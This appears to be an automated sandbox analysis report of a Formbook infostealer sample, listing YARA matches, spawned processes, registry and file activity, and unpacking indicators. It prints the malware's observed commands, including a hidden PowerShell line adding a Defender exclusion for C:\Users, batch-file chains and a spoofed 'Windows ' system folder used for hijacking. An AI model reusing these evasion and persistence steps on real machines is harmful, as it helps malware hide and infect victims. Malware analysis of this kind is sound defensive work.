        Source: 00000014.00000003.792418310.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 0000001B.00000002.827144868.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001B.00000002.827144868.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000014.00000003.792530901.0000000003CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.680764371.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.775417344.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.776363744.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.794288612.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.680899857.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000019.00000001.796805895.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000019.00000001.796805895.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000011.00000003.776524583.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.776620878.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.776945526.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.774394805.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.774870896.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 0000001D.00000002.916659708.00000000012A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001D.00000002.916659708.00000000012A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000014.00000003.795419491.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.774740375.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: C:\Users\Public\novtiC.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 25.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 25.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 27.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 27.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 25.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 25.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 27.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 27.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 27.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 27.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 27.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 27.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 25.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 25.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 25.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 25.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: classification engineClassification label: mal100.troj.evad.winEXE@29/18@9/2
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUUJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5684:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6232:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_01
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_effl5svh.hnm.ps1Jump to behavior
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\stt.bat' '
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\Public\Citvon\Citvon.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\Public\Citvon\Citvon.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\Public\Citvon\Citvon.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\Public\Citvon\Citvon.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\Public\Citvon\Citvon.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\Public\Citvon\Citvon.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\Public\Citvon\Citvon.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\Public\Citvon\Citvon.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\Public\Citvon\Citvon.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\Public\Citvon\Citvon.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\Public\Citvon\Citvon.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\Public\Citvon\Citvon.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exeVirustotal: Detection: 70%
        Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exeMetadefender: Detection: 35%
        Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exeReversingLabs: Detection: 65%
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeFile read: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe 'C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe'
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeProcess created: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\stt.bat' '
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\PXOR.bat
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows \System32\Netplwiz.exe C:\Windows \System32\Netplwiz.exe
        Source: C:\Windows \System32\Netplwiz.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Cdex.bat
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command 'Add-MpPreference -ExclusionPath 'C:\Users''
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\Public\Citvon\Citvon.exe 'C:\Users\Public\Citvon\Citvon.exe'
        Source: unknownProcess created: C:\Users\Public\Citvon\Citvon.exe 'C:\Users\Public\Citvon\Citvon.exe'
        Source: C:\Users\Public\Citvon\Citvon.exeProcess created: C:\Users\Public\Citvon\Citvon.exe C:\Users\Public\Citvon\Citvon.exe
        Source: C:\Users\Public\Citvon\Citvon.exeProcess created: C:\Users\Public\Citvon\Citvon.exe C:\Users\Public\Citvon\Citvon.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeProcess created: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\stt.bat' '
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\PXOR.bat
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows \System32\Netplwiz.exe C:\Windows \System32\Netplwiz.exe
        Source: C:\Windows \System32\Netplwiz.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Cdex.bat
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command 'Add-MpPreference -ExclusionPath 'C:\Users''
        Source: C:\Users\Public\Citvon\Citvon.exeProcess created: C:\Users\Public\Citvon\Citvon.exe C:\Users\Public\Citvon\Citvon.exe
        Source: C:\Users\Public\Citvon\Citvon.exeProcess created: C:\Users\Public\Citvon\Citvon.exe C:\Users\Public\Citvon\Citvon.exe
        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: Binary string: msiexec.pdb source: Citvon.exe, 00000019.00000002.867393416.0000000000960000.00000040.00000001.sdmp
        Source: Binary string: msiexec.pdbGCTL source: Citvon.exe, 00000019.00000002.867393416.0000000000960000.00000040.00000001.sdmp
        Source: Binary string: netplwiz.pdb source: Netplwiz.exe, 00000008.00000002.702460692.00007FF61AD35000.00000002.00020000.sdmp
        Source: Binary string: netplwiz.pdbGCTL source: Netplwiz.exe, 00000008.00000002.702460692.00007FF61AD35000.00000002.00020000.sdmp
        Source: Binary string: wntdll.pdbUGP source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, 00000003.00000002.698168920.0000000000B8F000.00000040.00000001.sdmp, Citvon.exe, 00000019.00000002.867470145.00000000009C0000.00000040.00000001.sdmp
        Source: Binary string: wntdll.pdb source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Citvon.exe, 00000019.00000002.867470145.00000000009C0000.00000040.00000001.sdmp

        Data Obfuscation:

        barindex
        Detected unpacking (changes PE section rights)Show sources
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeUnpacked PE file: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;
        Source: C:\Users\Public\Citvon\Citvon.exeUnpacked PE file: 25.2.Citvon.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;
        Source: C:\Users\Public\Citvon\Citvon.exeUnpacked PE file: 27.2.Citvon.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;
        Suspicious powershell command line foundShow sources
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command 'Add-MpPreference -ExclusionPath 'C:\Users''
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command 'Add-MpPreference -ExclusionPath 'C:\Users''
        Source: Citvon.exe.0.drStatic PE information: real checksum: 0xb7705 should be: 0xb5507
        Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exeStatic PE information: real checksum: 0xb7705 should be: 0xb5507
        Source: NETUTILS.dll.6.drStatic PE information: section name: .xdata
        Source: NETUTILS.dll.6.drStatic PE information: section name: /4
        Source: NETUTILS.dll.6.drStatic PE information: section name: /19
        Source: NETUTILS.dll.6.drStatic PE information: section name: /31
        Source: NETUTILS.dll.6.drStatic PE information: section name: /45
        Source: NETUTILS.dll.6.drStatic PE information: section name: /57
        Source: NETUTILS.dll.6.drStatic PE information: section name: /70
        Source: NETUTILS.dll.6.drStatic PE information: section name: /81
        Source: NETUTILS.dll.6.drStatic PE information: section name: /92
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 0_3_02288222 push 00405E24h; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 0_3_02288224 push 00405E24h; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 0_3_0228825C push 00405E5Ch; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 0_3_022853E8 push eax; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 0_3_0228871C push 0040631Ch; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 0_3_0228840A push 0040600Ch; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 0_3_0228840C push 0040600Ch; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 0_3_02289B74 push ecx; mov dword ptr [esp], eax
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 0_3_02287F44 push 00405B69h; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_004100F9 push ss; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00416216 push edx; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_0040C303 push edx; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_0040C3CE push FFFFFF97h; iretd
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_0041B3B5 push eax; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_0041B46C push eax; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_0041B402 push eax; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_0041B40B push eax; ret
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_004154F1 push ss; retf
